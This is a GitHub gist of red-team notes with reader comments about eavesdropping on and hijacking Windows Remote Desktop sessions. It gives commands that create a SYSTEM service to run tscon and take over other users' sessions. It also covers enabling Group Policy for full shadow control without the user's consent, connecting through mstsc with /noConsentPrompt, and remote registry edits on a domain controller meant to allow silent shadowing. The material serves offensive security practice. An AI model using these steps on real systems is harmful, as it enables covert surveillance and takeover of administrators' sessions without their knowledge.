Skip to content

Instantly share code, notes, and snippets.

@bohops
Last active October 7, 2024 12:16
Show Gist options
  • Save bohops/f722f1a54d9ac1070350bdcaf2da618b to your computer and use it in GitHub Desktop.
Save bohops/f722f1a54d9ac1070350bdcaf2da618b to your computer and use it in GitHub Desktop.
RDP Eavesdropping and Hijacking
*******************************
I spent some time this evening looking at ways to eavesdrop and hijack RDP sessions. Here is a gist of (semi) interesting findings
that is not very new...
===========
Inspiration
===========
As you may already know...
TSCON, amongst a few other tricks, is a nice way to hijack RDP sessions (even disconnected sessions) on the same box by executing the
command as SYSTEM like so:
sc.exe create hijackservice binpath= “cmd.exe /k tscon <#id> /dest:rdp-tcp#<num>”
sc.exe start hijackservice
Source ->[https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6]
(^Great write-up and well worth the read)
===============
Another Fun Way
===============
Let’s say that you own a server, a few servers, or the domain for that matter, but you really haven’t found a way to achieve your
ultimate Red Team goal. As “admin” (with a few caveats), you possess the ability to influence (local) Group Policy. With this power,
you can set Group Policy to “shadow” other *active* Remote Desktop/Terminal Server sessions. In other words, you can eavesdrop
(watch what the admin does) or completely take control of the session similar to TSCON. Here are the basic steps…
1) Influence domain group policy (gpmc.msc) or local group policy (gpedit.msc)
2) Drill down to this path...
Computer Configuration > Windows Settings > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host
3) Select “Set rules for Remote control of Remote Desktop Services user sessions”
4) Select Enable, Options, “Full Control without users permission”, Apply, OK
*You could also select “View Session without user’s permission” if you only want to eavesdrop
5) Wait a few minutes or force a group policy update
Gpupdate /force
6) Attempt to connect to the remote session with shadow.exe (if you can find it) or use qwinsta/mstsc like so…
Qwinsta /server:<target> //to get session
mstsc /shadow:<session> /v:<target> /control /noConsentPrompt
7) Grab popcorn and wait until the admin is no longer moving the cursor :-)
================
Some Other Notes
================
- This method has a lot of overhead, but the ability to observe is a powerful thing
- I read somewhere that this may not work on Server 2012 but was re-introduced in Server 2012 R2.
(I *assume* that this will work for previous versions in some way and 2012 R2 forward.)
- I tried to get this to work without the Group Policy via Registry manipulation but failed miserably
(I observed Access Denied Errors telling me the Group Policy wasn’t enabled...which was quite true)
- If you think you can find a way to get ^ to work, start here:
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet001\Control\Terminal Server\DefaultUserConfiguration" /t REG_DWORD /v fInheritShadow /d 0x0 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet001\Control\Terminal Server\DefaultUserConfiguration" /t REG_DWORD /v Shadow /d 0x2 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v fInheritShadow /d 0x0 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v Shadow /d 0x2 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet\Control\Terminal Server\WinStations\Console" /t REG_DWORD /v Shadow /d 0x2 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v fInheritShadow /d 0x0 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v Shadow /d 0x2 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\Console" /t REG_DWORD /v Shadow /d 0x2 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v fInheritShadow /d 0x0 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v Shadow /d 0x2 /f
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\Console" /t REG_DWORD /v Shadow /d 0x2 /f
- Thanks for taking the time to read this unorganized gist – Good Luck!
@rkotlarz-zz
Copy link

This wouldn't be very straight forward, but you could export the Local GPO using the LGPO.exe (Contained within "Microsoft Security Compliance Toolkit") to backup the GPO, then load that GPO on a temp VM, modify whatever GPO's you want to tweak and push it back to the client. Just make sure that the host name on the target and VM are the same and you should be good.

@bohops
Copy link
Author

bohops commented May 4, 2018

That's a good idea, thanks! I was also looking at something like this -> http://brandonpadgett.com/powershell/Local-gpo-powershell/

Could be viable - if I have some time this weekend, I'll check out these approaches and report back the findings (or gotchas)

@CaledoniaProject
Copy link

CaledoniaProject commented May 22, 2018

Shadowing only works on Windows 2012 R2 onward, does not work on Windows 2008 R2. So does the mstsc client.

@bohops
Copy link
Author

bohops commented May 26, 2018

^ This appears to be the case. From what I've read, it does work on 2003 but may require the use of shadow.exe

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment